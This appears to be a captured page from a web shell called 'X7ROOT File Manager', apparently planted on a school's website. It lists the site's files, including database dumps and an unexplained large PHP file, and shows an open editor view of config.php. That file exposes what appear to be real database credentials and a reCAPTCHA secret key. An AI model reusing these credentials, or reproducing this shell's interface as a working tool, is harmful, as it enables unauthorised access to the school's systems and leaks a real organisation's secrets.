X7ROOT File Manager
Current Path:
/home/u126090504/domains/chanakyahss.org.in/public_html
home
/
u126090504
/
domains
/
chanakyahss.org.in
/
public_html
/
📄
+2science.php
(6.75 KB)
📁
..
📄
about.php
(11.62 KB)
📄
achievers.php
(5.62 KB)
📁
admin
📄
application-form.php
(9.65 KB)
📁
assets
📁
chanayak
📄
config.php
(1.16 KB)
📄
contact.php
(8.18 KB)
📄
contactdb.php
(796 B)
📄
course.php
(43.71 KB)
📄
dmlt.php
(5.61 KB)
📄
downloads.php
(2.94 KB)
📄
facilities.php
(5.33 KB)
📄
faculty.php
(4.09 KB)
📄
footer.php
(8.19 KB)
📄
future (2).zip
(59.78 MB)
📄
gallery.php
(4.25 KB)
📄
gnm.php
(6.5 KB)
📄
header.php
(11.33 KB)
📄
index.php
(47.35 KB)
📁
lib
📄
peret.php
(266.87 KB)
📄
principal's-message.php
(3.11 KB)
📄
public-disclosure.php
(3.53 KB)
📁
qrcodes
📄
syllabus.php
(2.7 KB)
📄
thank-you.php
(1.28 KB)
📄
time-table.php
(2.25 KB)
📄
u126090504_future (2).sql
(29.78 KB)
📄
u126090504_future.sql
(29.78 KB)
📁
uploads
Editing: config.php
<?php // Production: hide display errors ini_set('display_errors', 0); ini_set('display_startup_errors', 0); error_reporting(E_ALL); // ✅ Fill these with EXACT values from hosting panel $server_name = "127.0.0.1"; $db_username = "u126090504_chanakya"; $db_password = "8984234299Aa@#"; // <-- your provided password $db_name = "u126090504_chanakya"; $db_port = 3306; define('RECAPTCHA_SITE_KEY', '6LfKtYYsAAAAALPCtsIckBbHXXbVwrbUuOfCC8ky'); define('RECAPTCHA_SECRET_KEY', '6LfKtYYsAAAAAKZUUIAxtdkHC4P7zjy625bmQq1B'); mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); try { $conn = new mysqli($server_name, $db_username, $db_password, $db_name, $db_port); $conn->set_charset("utf8mb4"); } catch (mysqli_sql_exception $e) { error_log("DB Connection failed: ".$e->getMessage()); http_response_code(500); die("Internal server error. Please try again later."); } /* App constants */ if (!defined('BASE_URL')) define('BASE_URL', 'https://chanakyahss.org.in/'); if (!defined('MAIL_FROM')) define('MAIL_FROM', 'no-reply@chanakyahss.org.in'); if (!defined('MAIL_FROM_NAME')) define('MAIL_FROM_NAME', 'chanakyahss');
Upload File
Create Folder